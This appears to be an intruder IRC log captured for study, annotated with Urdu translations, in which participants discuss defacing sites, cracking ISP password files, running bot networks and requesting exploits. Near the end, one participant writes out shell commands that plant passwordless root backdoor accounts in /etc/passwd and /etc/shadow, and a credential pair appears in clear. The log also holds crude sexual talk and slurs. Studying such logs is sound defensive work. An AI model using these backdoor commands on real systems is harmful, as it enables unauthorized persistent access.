      :D1ck :SHUTUP
      :D1ck :heh
      :Sp07 :oK
      :D1ck :
      :D1ck :_
      :Sp07 :_
      :J4n3 :(_|_)
      :Sp07 :0 \/\/4
      :J4n3 :(*Y*)
      :D1ck :heh
      :D1ck :WHO WILL SEXOR ME
      :D1ck :?
      :Sp07 :my dog will
      :J4n3 :8==D
      :J4n3 :lol
      :D1ck :dude
      :Sp07 :doggy style
      :D1ck :i dont like dogs
      :D1ck ::(
      :Sp07 :ok
      :D1ck :EVERY ONE TYPE control + a
      :D1ck :EVERY ONE TYPE control + S
      :D1ck :EVERY ONE TYPE control + S
      :D1ck :in linux
      :D1ck ::)
      :D1ck :PHAT6
      :D1ck :Tota1KaaS
      :J4n3 :i'm on w1nbl0w5
      :Sp07 :PHAT6
      :D1ck :inetd-s
      :D1ck :inetd-s
      :D1ck :anker
      :D1ck :CyneX
      :D1ck :w00p
      :Sp07 :metoo
      :Sp07 : control + a
      :Sp07 : control + S
      :Sp07 : control + S
      :Sp07 :control ass
      :D1ck ::)
      :D1ck :hi
      :D1ck :J4n3: i`m trying www.example.com and www.example.com
      :J4n3 :any luck so far ?
      :D1ck :but cant own it
      :D1ck :ACTION wonders
      :D1ck :i`m trying.
      :D1ck :nopes
      :D1ck :well
      :J4n3 :hmm
      :D1ck :J4n3 
      :D1ck : /dcc send d1ck cracked.example.txt
      :D1ck ::P
      :J4n3 :hahah kesc walay karnay dain tho na
      :J4n3 :waiasy oye ye waqayee example kee file hai ?
      :Sp07 :uhh you like sending things to yourself?
      :Sp07 :hehe
      :D1ck :ofcourse
      :D1ck :<J4n3> waiasy oye ye waqayee example kee file hai ?
      :D1ck :?
      :Sp07 :waiasy oye ye waqayee example kee file hai
      :D1ck :kyoon nahin ?
      :D1ck :example ki file ai
      :D1ck :HAHAHAHHA
      :D1ck :Sp07: shutup, were speaking urdu
      :J4n3 :ek niklaa thaa,   user : nycop   pass : 1955
      :D1ck :heh
      :J4n3 :chala nahin
      :Sp07 :kesc ye karnay kee tho waqayee
      :D1ck :k
      :J4n3 :lol
      :D1ck :;P
      :J4n3 :Sp07 speakin urdu wow
      :Sp07 :yup
      :Sp07 :chala
      :D1ck :hahah
      :D1ck :LOL
      :D1ck :Sp07  madr chode 
      :D1ck :chootiyay
      :D1ck :randi kay ...
      :Sp07 :you
      :Sp07 :kay chootiyay madr
      :D1ck ::P
      :D1ck :?
      :D1ck :HAHAHAHAH
      :J4n3 :hahahha
      :J4n3 :barwa dalla
      :D1ck :lol
      :Sp07 :SI SI
      :D1ck ::)
      :Sp07 :MUY BIEN
      :D1ck :ACTION fingers Sp07 wet pussy
      :Sp07 :oh yeah
      :Sp07 :ACTION fingers d1ck dry pussy
      :D1ck :jane sun .in ko sadmind and ttdb kar
      :D1ck :deface
      :Sp07 :deface my dick
      :D1ck :dude
      :D1ck :i would
      :D1ck :but
      :D1ck :problem 
      :D1ck :is
      :Sp07 :I know I know
      :Sp07 :too small
      :Sp07 :FUK U
      :D1ck :that
      :D1ck :u
      :D1ck :dont
      :D1ck :have
      :D1ck :1
      :D1ck ::(
      :Sp07 :ACTION pulls of dick
      :Sp07 :ACTION shoves dick in d1cks face
      :Sp07 :ACTION puts dick back on
      :D1ck :haha
      :D1ck :OH
      :D1ck :NOW THATS FLEXIBLE
      :D1ck :J4n3 
      :D1ck :he thinks i am a fed
      :D1ck :fbi
      :Sp07 :fBi
      :D1ck :fBi.gOV
      :Sp07 :uhh
      :Sp07 :thats my server
      :Sp07 :fBi.GoV
      :Sp07 :DiSeAsE.fBi.GoV
      :D1ck :LAILA
      :D1ck :P00P
      :D1ck :J4n3 
      :Sp07 :you guys live near each other?
      :D1ck :yep
      :D1ck :he's my anal partner
      :D1ck :
      :D1ck ::)
      :D1ck :and some times we do 3some
      :D1ck :heh
      :Sp07 :he
      :Sp07 :heh
      :Sp07 :POLICE OUTSIDE MY HOUSE
      :Sp07 :let me go get my gun
      :Sp07 :jk hehehe
      :Sp07 :did you deface onghome.com
      :D1ck :no
      :Sp07 :deface yahoo.com
      :D1ck :its not my box
      :D1ck :J4n3 
      :Sp07 :and people will respecty ou
      :Sp07 :hehe
      :D1ck :J4n3 s
      :D1ck :heh
      :D1ck :i mostly do indian sites
      :Sp07 :www.india.com
      :Sp07 :orsomethign
      :Sp07 :ehe
      :Sp07 :somethinf famous
      :Sp07 :like whitehouse.gov
      :nohup :hey look at my ip
      :nohup :i am a kewl bot
      :nohup :should i deface this?
      :Sp07 :no
      :Sp07 :yeah
      :Sp07 :you should deface it then delete everything
      :Sp07 :and when they get it back up
      :Sp07 :hack it again
      :D1ck :i patched it
      :D1ck :but i will depatch it
      :D1ck :J4n3 
      :D1ck :where are u when i need u
      :D1ck :where are u when i need u
      :D1ck :where are u when i need u
      :Sp07 :with another man
      :D1ck :lol
      :D1ck :J4n3 
      :D1ck : /wi nohup 
      :D1ck :fuck
      :D1ck :where are u
      :D1ck :d4v3
      :J4n3 :D1ck
      :J4n3 :here
      :D1ck :i am defacing mail.example.com
      :D1ck :k?
      :D1ck :K
      :D1ck :?
      :D1ck :?
      :D1ck :?
      :J4n3 :hmm
      :D1ck :?
      :J4n3 :now ?
      :J4n3 :u mean defacing now ?
      :D1ck :yep?
      :D1ck :we can deface and fix the index after attrtion mirrors
      :D1ck :and when they will email i`ll deleted their mail from rdm database
      :J4n3 :oh
      :J4n3 :okay 
      :D1ck :?
      :D1ck :wana do it?
      :J4n3 :actually main sonay ja raha tha, kal na karlain ???
      :D1ck :ok
      :D1ck ::(
      :D1ck :hehe
      :J4n3 :agar if u want now, then ok
      :D1ck :kal kar lain gay
      :J4n3 :main bet jaatha hon :)
      :D1ck :cya
      :J4n3 :?
      :D1ck :;)
      :D1ck :take care
      :J4n3 :heh okies thanx
      :J4n3 :theri bhabi ut gayee hai cheekh rahi hai mujh par
      :J4n3 :ab sojao
      :J4n3 :and i'm feelin horny too :P
      :J4n3 :errrrr
      :J4n3 :see ya
      :J4n3 :g0ne
      :D1ck ::P
      :J4n3 ::)
      :D1ck :hehehe
      :D1ck :cya
      :D1ck ::)
      :D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
      :Sp07 :yo d1ck
      :D1ck :?
      :D1ck :brb
      :D1ck :trojaning boxens
      :D1ck :heh
      :Sp07 :send me some sun5.7 exploits
      :Sp07 :local
      :Sp07 :just wanna root this box and thats all
      :Sp07 :hehe
      :D1ck :i dont have it
      :Sp07 :uhhhh
      :Sp07 :you dont have any?
      :D1ck :brb
      :D1ck :nope
      :D1ck :ACTION is away: (bbiab) [BX-MsgLog On]
      :Sp07 :scala% id
      :Sp07 :uid=502(kasidit) gid=10(staff) 
      :Sp07 :uhh you suck
      :Sp07 :nohup?
      :D1ck :back
      :D1ck :.add D1ck * D1ck 100 1 4
      :D1ck :.save
      :Sp07 :.add Sp07 too
      :Sp07 :=D
      :D1ck :okie
      :Sp07 :.add Sp07 * Sp07 100 1 4
      :D1ck :.add Sp07 #k1dd13 Sp07 70 1 4
      :Sp07 :hwhwhw
      :D1ck :heh
      :D1ck :.save
      :Sp07 :.up
      :Sp07 :.up
      :D1ck :____p____ nick in-gov
      :Sp07 :woho
      :D1ck :___up____ nick nutsack
      :D1ck :nohup3309 nick domestic
      :D1ck :nohup6607 nick hostile
      :D1ck :nohup6607 nick peniswise
      :Sp07 :nohup6607 nick blowjob
      :Sp07 :hehe
      :D1ck :nohup6607 nick blowjob
      :D1ck :nohup8585 nick blowjob
      :Sp07 :theres no passwords?
      :D1ck :nohup7911 nick graz
      :D1ck :graz nick graz-at-
      :D1ck :nohup_ nick dig-ns
      :Sp07 :nohup___ nick nutsac
      :D1ck :nohup____ nick [shit]
      :D1ck :_ohup____  sexfig
      :D1ck :.add D1ck * D1ck 100 1 4
      :D1ck :.save
      :Sp07 :nohup__ nick slut
      :Sp07 :nohup__ nick ms-whore
      :D1ck :nohup__ nick slut
      :D1ck :nohup__ nick ms-whore
      :D1ck :.q
      :D1ck :_ohup____ nick crackX
      :D1ck :%_ohup____ nick whoami
      :D1ck :__hup____ nick uname-a
      :D1ck :nohup_ nick nig
      :D1ck :nohup__ nig die
      :D1ck :nohup___ nick ms-sin
      :D1ck :nohup__ nick hornkiten
      :D1ck :nohup8815 nick identd
      :D1ck :.save
      :D1ck :.add D1ck * D1ck 100 1 4
      :D1ck :.save
      :D1ck :jej
      :D1ck :nohup userlist
      :D1ck :fuck
      :D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
      :Sp07 :autoop?
      :D1ck :yeo
      :Sp07 :.say hi
      :D1ck :yep
      :Sp07 :.help
      PRIVMSG Sp07 :DCC CHAT CHAT 2886730091 32847
      :Sp07 :damn thats a lot of bots
      :D1ck :dos_ nick ARGV1
      :D1ck :i have 70+
      :D1ck :glined
      :D1ck :and 42+ down
      :D1ck ::?(
      :D1ck : t mail.examplea.com 1080
      :D1ck :Trying 192.168.103.131...
      :D1ck :Connected to mail.example.com.
      :D1ck :Escape character is '^]'.
      :D1ck :HAHAHAAHA
      :D1ck :dziasta uses wingate
      :D1ck :now
      :D1ck :LOL
      :Sp07 :?
      :Sp07 :heh
      :D1ck :rofl
      :D1ck :err VeNoMouS 
      :D1ck :is
      :D1ck :a
      :D1ck :u33r
      :D1ck :qu33r
      
      =-=
      
      Day 11 June 14
      
      :J4n3! :D1ck
      :J4n3! :moi back :p
      :D1ck! :yo
      :D1ck! :i owned mar1s
      :D1ck! :the real server
      :D1ck! :and uploaded their radius log
      :D1ck! :bur
      :J4n3! :mar1s ?
      :D1ck! :but they are encrypted unlike satnet
      :D1ck! ::(
      :D1ck! :mars.example.net
      :J4n3! :ohhh
      :D1ck! :give me a ip
      :J4n3! :then ? what's the result ?
      :D1ck! :i`ll tell the user name
      :D1ck! ::)
      :J4n3! :wait
      :D1ck! :k
      :J4n3! :hehe no example users online
      :D1ck! :lol
      :J4n3! :yaar example kay password jo nikal rahay hain /etc/passwd wo chal nahi rahay :/
      
      dude whatever passwords coming out from example /etc/passwd those arent working
      
      :D1ck! :;P
      :D1ck! :wana deface mail.example.com
      
      [Saumil's note: example is a standard Indian greeting... example.com is an Indian site that
      delivers Indian gifts to the US]
      
      :D1ck! :or we should wait?
      :D1ck! :kewl
      :D1ck! ::)
      :D1ck! :oye
      :D1ck! :i have example ka personal date in MY COMPUTER
      
      I have example's personal data (i think date might be a typo) in MY COMPUTER
      
      :D1ck! :over 50 MB
      :D1ck! :AHAHAHAHAH
      :D1ck! :all khawar nehal's work
      :D1ck! :inmy pc
      :D1ck! :LOL
      :J4n3! :haha tight
      :J4n3! :oye deface kardo
      
      yo let's deface (them)
      
      :D1ck! :he's 'OK'
      :D1ck! :oki
      :J4n3! :lekin yaar ye pass kyon nahi chal rahay :?
      
      but dude why arent these pass(words) working?
      
      :D1ck! :?
      :J4n3! :the pass from that shadow file :
      :D1ck! :dunno jani
      
      dont know pal
      
      :J4n3! :they r fresh they should work naa
      :D1ck! :;P
      :D1ck! :?
      :D1ck! :oye brb rebooting to win
      :D1ck! :brb
      :J4n3! :kkz
      :atlanta.ga.us.undernet.org 005 pencil SILENCE=15 WHOX WALLCHOPS USERIP CPRIVMSG CNOTICE MODES=6 MAXCHANNELS=15 MAXBANS=30 NICKLEN=9 TOPICLEN=160 KICKLEN=160 MAP :are supported by this server
      :D1ck! :J4n3 
      :D1ck! :there?
      :D1ck! :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On]
      :J4n3! :D1ck
      :J4n3! :D1ck
      :J4n3! :lets deface
      :J4n3! :wow
      :J4n3! :mera jooota hai japani , ye pathloon englistaani , sir pay laaal topi rooosi phir bee dil hai balochistani :p
      
      [Note: lines from a popular Hindi movie song, except at the end he
      says my heart is Baluchistani. Baluchistan is a province in Pakistan.]
      
      :J4n3! :chunari chunari
      
      chunari = veil
      
      :J4n3! :.up
      :netro! :3 days 14:51:23time
      :PHAT! :4 days 13:45:02time
      :J4n3! :D1ck
      :D1ck! :J4n3 
      :D1ck! :yaar my mousr ka slot is not working
      
      dude my mouse slot isnt working
      
      :D1ck! :i am mouseless
      :D1ck! ::(
      :J4n3! :lol
      :J4n3! :how ?
      :J4n3! :port kharab hai ?
      
      is the port malfunctioning?
      
      :D1ck! :yep
      :D1ck! :port
      :D1ck! :ps/2
      :D1ck! :ttys0 is modem
      :D1ck! :mouse ka hai magr modem work karta he
      
      the mouse's (port) is there but the modem is working as well
      
      :D1ck! :KHAWAR NEHAL IS GAY
      
      [note from Saumil: Khawar Nehal is a guy's name, and a quick Google search
      on him turned this up in one of the pages:
      
      Subject: Research on ISP ?
      From: Khawar Nehal <knehal@bigfoot.com>
      Date: Sat, 13 Nov 1999 13:35:12 +0500 (PKT)
      X-Message-Number: 4
      
      What would you like to know ?
      
      ISP as in Internet SERVICE Provider is an extremely large number of
      SERVICES from trying to replacing broken coffeecup holders for customers
      sitting in the 'dark' to setting up creating your own gateways
      and routers so that your network stays up under DOS attacks.
      
      Thank You.
      
      
      --end of note]
      
      :D1ck! :I OWN HIM
      :D1ck! :HAHAHAHAHAHAA
      :D1ck! :HGOT 0 SECURITY SKILL1
      :J4n3! :hahahah yeah
      :J4n3! :in security he is Zero
      :J4n3! :i told u before
      :D1ck! :yeo
      :D1ck! :://
      :J4n3! :u owned example again ?
      :D1ck! :well
      :D1ck! :i lost ns1 and mail
      :D1ck! :but i owned mars
      :D1ck! :but i dunno if i still have
      :J4n3! :He He
      :J4n3! :yaar i have 800 + password of paknet, but not of karachi, 
      :J4n3! :and they aren't working here :(
      :D1ck! :they close 21 22 23 513
      :D1ck! ::(
      :D1ck! :reb.tar.gz == MASS win9.x reboot
      :D1ck! :by D1ck
      :D1ck! :oh
      :D1ck! :kewl
      :D1ck! :send me the file
      :D1ck! :hehe
      :J4n3! :3 different files  1 of quetta, pishwar and gujrawala,    right now cracking fasialbad
      
      [note from Saumil: quetta, peshawar, gujrawala and faisalabad are cities/provinces
      in Pakistan; so is multan]
      
      :J4n3! :multan is baqi hia
      
      multan is still pending
      
      :J4n3! :bejon ?
      
      should i send?
      
      :D1ck! :?
      :D1ck! :yp
      :D1ck! :yep
      :D1ck! :bhej
      
      send
      
      :D1ck! :
      :D1ck! ::P
      :J4n3! :wait
      :D1ck! :okies
      :D1ck! :dokies
      :D1ck! :oye where are j0e's botS?
      :J4n3! :uska server band huwa hia kisi nay koi abuse ya dos attack kiya tha
      
      his server is down now. someone had done an abuse or a DoS attack on him
      
      :D1ck! :shit
      :D1ck! :finished?
      :J4n3! :yup
      :J4n3! :3 files hain ye baaqi 2 baqi hain
      
      there are 3 files and the other 2 are remaining
      
      :D1ck! :abey
      
      hey
      
      :D1ck! :oh
      :D1ck! :<bacha> mujhay aap say milna hai
      
      <kid boy> i would like to meet you
      
      :D1ck! :<hritk> to have a c0ke
      
      [note from saumil: dont know what this hritk is]
      
      :J4n3! :<bachi> mujay aap say mil kar sex karna hai
      
      <kid girl> I would like to meet you and have sex with you
      
      :D1ck! :<bacha> hrtik
      :D1ck! :hahahaha
      :D1ck! :<htrik> find me with c0ke
      :D1ck! :what stupid add
      :D1ck! :haha
      :J4n3! :heh
      :J4n3! :oye send me that bnc file of phycoid
      :J4n3! :phsycoid
      :D1ck! :?
      :D1ck! :oki
      :D1ck! :wait
      :J4n3! :k
      :J4n3! ::)
      :D1ck! :dont distro
      :J4n3! :hehe nope
      :D1ck! :errrrrr
      :D1ck! :too many ping timeouts
      :J4n3! :yeah
      :D1ck! :WONDER jump austin.tx.us.undernet.org
      :D1ck! :quit
      :J4n3! :fuck
      :m4ry! :.say hi
      :m4ry! ::/
      :m4ry! :jupe?
      :m4ry! :ur guys are juping DEAThaces?
      :Sp07! :.up
      :Sp07! :.up
      :m4ry! :hey dis
      :Sp07! :hy
      :Sp07! :hey
      :D1ck! :sup
      :D1ck! :J4n3 
      :atlanta.ga.us.undernet.org 005 pencil SILENCE=15 WHOX WALLCHOPS USERIP CPRIVMSG CNOTICE MODES=6 MAXCHANNELS=15 MAXBANS=30 NICKLEN=9 TOPICLEN=160 KICKLEN=160 MAP :are supported by this server
      :atlanta.ga.us.undernet.org 005 pencil SILENCE=15 WHOX WALLCHOPS USERIP CPRIVMSG CNOTICE MODES=6 MAXCHANNELS=15 MAXBANS=30 NICKLEN=9 TOPICLEN=160 KICKLEN=160 MAP :are supported by this server
      :D1ck! :J4n3 
      :J4n3! :D1ck
      :D1ck! :sup?
      :D1ck! :i have to go today :(
      :D1ck! :for mouse
      :J4n3! :nuff much just cracked fsd paknet, 691 paases lol
      :J4n3! :oh
      :J4n3! :yeah mouse is important
      :D1ck! :kewl
      :D1ck! : /dcc send d1ck cracked.txt
      :D1ck! :heh
      :J4n3! :heeh wiat
      :D1ck! :ki
      :D1ck! :hehe 
      :D1ck! :coool
      :D1ck! :man crack zoooooooooooooom
      :D1ck! :man crack zoooooooooooooom
      :J4n3! ::p
      :D1ck! :;p
      :D1ck! :where woul those passwords work?
      :J4n3! :yaar uskay pass kaam he nahi kar rahay plus abee lagatha hon phir say usko, deko agar listh na jayen tho kal tho hojayega
      
      dude his passwords are not working at all. seems like let's check him out again, see if the list doesnt go through then it will be done by tomorrow
      
      :D1ck! :woul=would.
      :D1ck! :oh okin
      :D1ck! ::P
      :J4n3! :yaar ye samaj main nahi aaraha, in their website they says its romaing in paknet
      
      dude i cant understand this - in their website it says it is roaming in Paknet
      
      :D1ck! :roaming/.
      :D1ck! :?
      :J4n3! :roaming yeah, like u use account all over in pakistan like comsats
      :D1ck! :oh
      :D1ck! :do u put username@khi?
      :D1ck! :in comsats
      :D1ck! :u do that
      :J4n3! :nope try kiya
      :J4n3! :nahin horaha 
      
      doesnt happen
      
      :J4n3! ::/
      :D1ck! :oh
      :D1ck! ::/
      :J4n3! :i tried of quetta only 
      :J4n3! :ther aren't workin
      :D1ck! :oki
      :D1ck! :call them and ask
      :J4n3! :yeah i told Rsnake to call them and ask
      :D1ck! :'Hi main quetta say hooon
      :D1ck! :'Hi main quetta say hooon
      
      Hi I am from Quetta. You sister-fucker, I cant connect
      Hi I am from Quetta. You sister-fucker, I cant connect
      
      :D1ck! :oh
      :J4n3! :LOOL
      :D1ck! :hehe
      :J4n3! :haha dekho aaj pooctha hon us say, agar usnay nahi kiya call tho main karkay poochonga
      
      haha see today i will ask him, if he doesnt call, then i will do it and ask him again
      
      :D1ck! :oye is rsnake online?
      :D1ck! :oki
      :J4n3! :nahin not now
      
      nahin = no
      
      :D1ck! :oh
      :J4n3! :yaar that psyBNC is cooooooooooooooooool
      :J4n3! :tight tight
      :D1ck! :u know what modem he has?
      :J4n3! :it rox
      :D1ck! :for linux?
      :D1ck! :hehe 
      :D1ck! :psyBNC
      :D1ck! :r0x
      :J4n3! :hmm he told me , its not zoltrix kuch ajeeb saa naam ahi
      
      hmm he told me, it is not zoltrix. some really weird name
      
      :D1ck! :ok
      :D1ck! :MINE SUCKS
      :D1ck! :$#%#$%#&^%$#
      :D1ck! :d4v3
      :D1ck! :i want to register www.k1dd13-online.org
      :D1ck! :hmmm
      :J4n3! :hmm
      :J4n3! :registeration dotster.com
      :D1ck! :gimme some GOOD server
      :J4n3! :cooool
      :J4n3! :bu
      :J4n3! :but
      :D1ck! :?
      :J4n3! :i think register plus host to somewhere
      :D1ck! :yea
      :D1ck! :tell me some good server, that wuld host it?
      :J4n3! :there r many good servers but question is  , i doubt if they host hacking site or not
      :D1ck! :oh
      :D1ck! :shit 
      :D1ck! :i lost 
      :D1ck! :mars
      :J4n3! :yeah thats the problem
      :J4n3! :shit
      :D1ck! :;p
      :D1ck! :but i knew i would
      :J4n3! :lol 
      :J4n3! :how ?
      :D1ck! :HAHHHAHAAHAA
      :D1ck! :they reinstalled linux
      :D1ck! :its still vulneable
      :D1ck! :LOL
      :D1ck! :HAHAHAHAHAHAHAHAHAH
      :D1ck! :they reinstalled all 3 boxes
      :D1ck! :ROFL
      :J4n3! :lol
      :D1ck! :;p
      :D1ck! :i`ll hack all again'
      :J4n3! :u mean still vulnerable by ? bind ?
      :D1ck! :eYe OwN KHaWaR NeHaL
      :D1ck! :my brother sed 'nehal is a very proud person and he sucks'
      :D1ck! :yeah
      :J4n3! :yaar waiasy banda proudy nahin hai, kush ikhlaaq banda hai
      
      dude that way the guy isnt a proudy (slang: stuck up) chap ....seems to be a down to earth chap
      
      :J4n3! :example ka naveed admin hai , wo bara proudy hai he sux
      
      example's admin is naveed. he's really proudy - he sucks
      
      :D1ck! :yaar
      :D1ck! :<Knehal> weell i u dont take my coure u can never suceeeed in ISP bussiness
      
      [Note: seems this k. nehal guy seems to be teaching courses on how to set up ISPs]
      
      :D1ck! :<brother> fuck off
      :J4n3! :lol
      :D1ck! :hehe
      :J4n3! :humsay tho bauth acha raha hai , meri us say dosthi be hogayee thee kaafi
      
      he's been good to us. i developed a good friendship with him too
      
      :D1ck! :<Knehal> i made all isps successful
      :J4n3! :ek do marthaba ghar bee drop kiya tha usay
      
      a couple of times i had even visited his house
      
      :D1ck! :kewl
      :D1ck! :how much money did he take?
      :D1ck! :700 or 7000
      :D1ck! :?
      :D1ck! :for modewl 1
      :J4n3! :dunno how much personally but i think less then 5000
      :D1ck! :oh
      :D1ck! :tell him to school us
      :D1ck! :hehe
      :J4n3! :karlega, wait
      
      will have it done, wait
      
      :J4n3! :i got one of his email about his courses, shall i forward it to u ?
      :D1ck! :yaar its so far for me :/
      :D1ck! :yep
      :D1ck! :forward
      :D1ck! :cr15@hotmail.com and dynamic@example.org (yUCK_
      :D1ck! :)
      :D1ck! ::)
      :J4n3! :wait
      :D1ck! :ok
      :J4n3! :Course outline :
      :J4n3! :Introduction
      :J4n3! :History
      :J4n3! :X windows Setup
      :J4n3! :Dialup Networking
      :J4n3! :Ethernet Networking
      :J4n3! :TCP/IP
      :J4n3! :SMB
      :J4n3! :Sendmail Mail server
      :J4n3! :Apache Web Server
      :J4n3! :Applixware
      :J4n3! :DNS Server
      :J4n3! :NFS
      :J4n3! :Sound Card Configuration
      :D1ck! :errrrr
      :D1ck! :i know all that.
      :D1ck! :is that it?
      :D1ck! :heh
      :J4n3! :that is for first module i think
      :D1ck! :oh
      :D1ck! :*sigh*
      :D1ck! :*sigh*
      :D1ck! :www.example.com
      :D1ck! :hahaha
      :J4n3! :ok sent :)
      :D1ck! :www.example.com
      :D1ck! :all indian ns
      :D1ck! :lol
      :D1ck! :thx
      :J4n3! :wow
      :J4n3! :kool
      :J4n3! :yaar ye defacement ab tight hogee
      
      dude this defacement will now become tight.
      
      :D1ck! :yep
      :D1ck! :so sup?
      :D1ck! :naveeed ko example ka pata laga?
      
      has naveed figured out about example?
      
      :D1ck! :haha
      :J4n3! :yup
      :J4n3! :bataya mainay
      
      yup, i had told him
      
      :D1ck! :oye
      :D1ck! :where did u send
      :D1ck! :dynamic@example.org?
      :J4n3! :both
      :D1ck! :k dint get it yet /
      :D1ck! ::/
      :Sp07! :.say a
      :Sp07! :dos help
      :Sp07! :.
      :D1ck! :=)
      :D1ck! :i had a bot
      :D1ck! :with uptime of 90 days
      :D1ck! :but on fine morning
      :D1ck! :i was sitting
      :D1ck! :and he/she pinged
      :D1ck! :and never came back ):
      :Sp07! :sup
      :Sp07! :[Sp07@raptorshells Sp07]$ uptime
      :Sp07! :  9:23pm  up 103 days,  8:37,  1 user,  load average: 1.00, 1.00, 1.00  
      :Sp07! :my friends shell
      :D1ck! :thats nothing dude
      :D1ck! :dude
      :D1ck! :i has a box at netkonnect
      :D1ck! :uptime ws 630 days
      :D1ck! :thats like 2 years
      :Sp07! :heh
      :D1ck! :heh
      :D1ck! :dude
      :D1ck! :dis
      :D1ck! :look for 8.1.2 overflow for me pls
      :D1ck! :THANKS
      :Sp07! :?
      :J4n3! :.msg |sanam| Sanammmmmmmmmm :)
      PRIVMSG |sanam| :Sanammmmmmmmmm :)
      :J4n3! :.join #d4v3
      :J4n3
      :J4n3
      :|sanam|
      :J4n3
      :J4n3
      :|sanam|
      
      are these all
      
      :|sanam|
      
      your bots?
      :J4n3
      
      yes all these are mine :)
      
      :J4n3
      
      these are too few
      
      :J4n3
      
      all the other poor bots are down
      
      :J4n3
      :J4n3
      
      awww... has it gone this far?
      
      :|sanam|
      
      who?
      
      :|sanam|
      
      who?
      
      :J4n3
      
      you and who?
      
      :|sanam|
      :|sanam|
      :J4n3
      
      sir....
      
      :J4n3
      
      express your desire
      
      :|sanam|
      
      you keep one for pinging
      
      :J4n3
      
      ok as you wish master
      
      :J4n3
      
      you shall receive one for pinging by tomorrow
      
      :|sanam|
      
      -=-
      
      Day 12 June 15
      
      :|S4n4m| :tum aisey hi bolna
      
      Just keep on saying like this
      
      :|S4n4m| :karna kuch nahi
      
      dont do anything
      
      :J4n3 :ye baath hai ?
      
      is that the deal?
      
      :|S4n4m| :han
      
      yes
      
      :|S4n4m| :yeh bat hay
      
      that is the deal
      
      :J4n3 :ping bot aaraha hai
      
      the ping bot is coming
      
      :|S4n4m| :instooooooooooooooooooooo
      :|S4n4m| ::)
      :|S4n4m| :karachi mey aooo
      
      come to karachi
      
      :J4n3 :ok bot aagaya
      
      ok the bot is here
      
      :J4n3 :d3s|r3 hai uska nick
      
      its nick is d3s|r3
      
      :J4n3 :ab main channel par tyep karo ping me
      
      now type in the main channel in ping (Note:: dont know what it translates to)
      
      :J4n3 :<d3s|r3> PiNG THiNGiE - hiall's ping reply took 13 seconds
      :|S4n4m| :hmmm
      :|S4n4m| :tahnks
      :J4n3 :dekha ?
      
      saw that?
      
      :J4n3 :ab khush ?
      
      now are you happy?
      
      :|S4n4m| :han
      
      yes
      
      :|S4n4m| :kush
      
      happy
      
      :J4n3 :bus thum khush raho :)
      
      that's all ... keep staying happy :)
      
      :|S4n4m| :wah
      
      cool
      
      :|S4n4m| :kya bat hay app ki
      
      what shall i say about you
      
      :|S4n4m| :wasey
      :|S4n4m| :mey ney ek bandha rakh leeya hay
      
      i have kept one system for myself
      
      :|S4n4m| :ping key leyya
      
      for pinging
      
      :J4n3 :thumara bandaa 24 hour nahin betay gas
      
      your system wont be for 24 hours (Note:: again i am having difficulty translating - grammar issues in urdu)
      
      :J4n3 :mera bot hoga
      
      my bot will
      
      :|S4n4m| :hmmmmmmmmmm
      :|S4n4m| :instoo
      :|S4n4m| :zara 5 min key leyee
      
      for a little bit... 5 mins
      
      :|S4n4m| :karachi channel per
      
      on karachi channel
      
      :|S4n4m| :flori ka interview ley loo
      
      take flori's interview
      
      :|S4n4m| :mey ney appoint kya hay
      
      i have appointed (him/her?)
      
      :J4n3 :hahaha nahin thum khud hee laylo
      
      yes yes, but take it yourself (the interview)
      
      :|S4n4m| :kyon
      
      why?
      
      :|S4n4m| :tum yahn key op hoo
      
      you are the op here
      
      :|S4n4m| :admintration mey hoo
      
      i am in administration
      
      :J4n3 :op thum oh main co-founder hon
      
      you are the op, i am the co-founder
      
      :J4n3 :aaayee meraa dil......chua kay lagyeeee...churanay wali meri qaatil
      
      ohhh.... she stole my heart
      
      :|S4n4m| :han wohi hii
      
      yes, her
      
      :|S4n4m| :hello
      :|S4n4m| :kya hoa
      
      what happened?
      
      :J4n3 :wait
      :J4n3 :.up
      :J4n3 :.op netra
      :J4n3 :.op Ott0
      :Dew :Hey J4n3 u there ?
      :J4n3 :.host add J4n3 *
      :J4n3 :.up
      :J4n3 :OngHome esay $uptime
      :D1ck :J4n3 
      :D1ck :i`m getting my own server;)
      :D1ck :J4n3 
      :D1ck :J4n3 
      :J4n3 :D1ck
      :J4n3 :i'm here
      :D1ck :hehe
      :D1ck :J4n3 
      :J4n3 :hehe
      :J4n3 :D1ck
      :D1ck :oye give me those commands for linux password adding and sun adding re ro re r i gave u
      :D1ck ::P
      :D1ck :i lost mine
      :J4n3 :wait
      :D1ck :and i dont wana make again
      :J4n3 :cp /etc/passwd /etc/.tp;
      :J4n3 :echo "ro::99999::::::" >> /etc/shadow;
      :J4n3 :echo "r::99999::::::" >> /etc/shadow;
      :J4n3 :echo "ro:x:500:1000::/:/bin/bash" >> /etc/passwd;
      :J4n3 :echo "r:x:0:0::/:/bin/bash" >> /etc/passwd;
      :J4n3 :cp /etc/shadow /etc/.ts;
      :D1ck :k
      :J4n3 ::p
      :D1ck :and suhn
      :D1ck :?
      :D1ck :sun
      :D1ck :?
      :J4n3 :wait
      :D1ck :gimme sun tew
      :D1ck :k
      :J4n3 :cp /etc/passwd /etc/.tp;
      :J4n3 :echo "re::6445::::::" >> /etc/shadow;
      :J4n3 :echo "r::10891::::::" >> /etc/shadow;
      :J4n3 :echo "re:x:500:1000:daemon:/:/sbin/sh" >> /etc/passwd;
      :J4n3 :echo "r:x:0:0:User:/:/sbin/sh" >> /etc/passwd;
      :J4n3 :cp /etc/shadow /etc/.ts;
      :D1ck :thx
      :J4n3 :np :p
      :D1ck :oye
      :D1ck :me getting a box
      :D1ck :T+3
      :D1ck :T3
      :J4n3 :wow
      :J4n3 :kewl
      :D1ck :where should i get?
      :D1ck :where is j0e getting
      :D1ck :d4v3 i want the folling domains
      :J4n3 :folling ?
      
      (Note:: misspelt "following")
      
      :D1ck example.org
      :J4n3 :j0e say contact nahi huwa called him 2 times
      
      j0e said there has been no contact ... called him 2 times
      
      :D1ck :wetcunts.net
      :J4n3 :example hmm
      :J4n3 :mil jayega agar register nahi huwa hai tho
      
      we will get it if it has not been registered
      
      :D1ck :undefined.net
      :D1ck :and kewl ones
      :D1ck :but not one's that end with zzz
      :D1ck :like dreamzzz.net
      :D1ck :etc
      :D1ck :eeet.org
      :D1ck :eeet.net
      :D1ck :oye
      :D1ck :how much j0e paid
      :D1ck :and what server?
      :J4n3 :he paid 250 $
      :J4n3 :from example.net
      :D1ck :kewl
      :D1ck :for a T3?
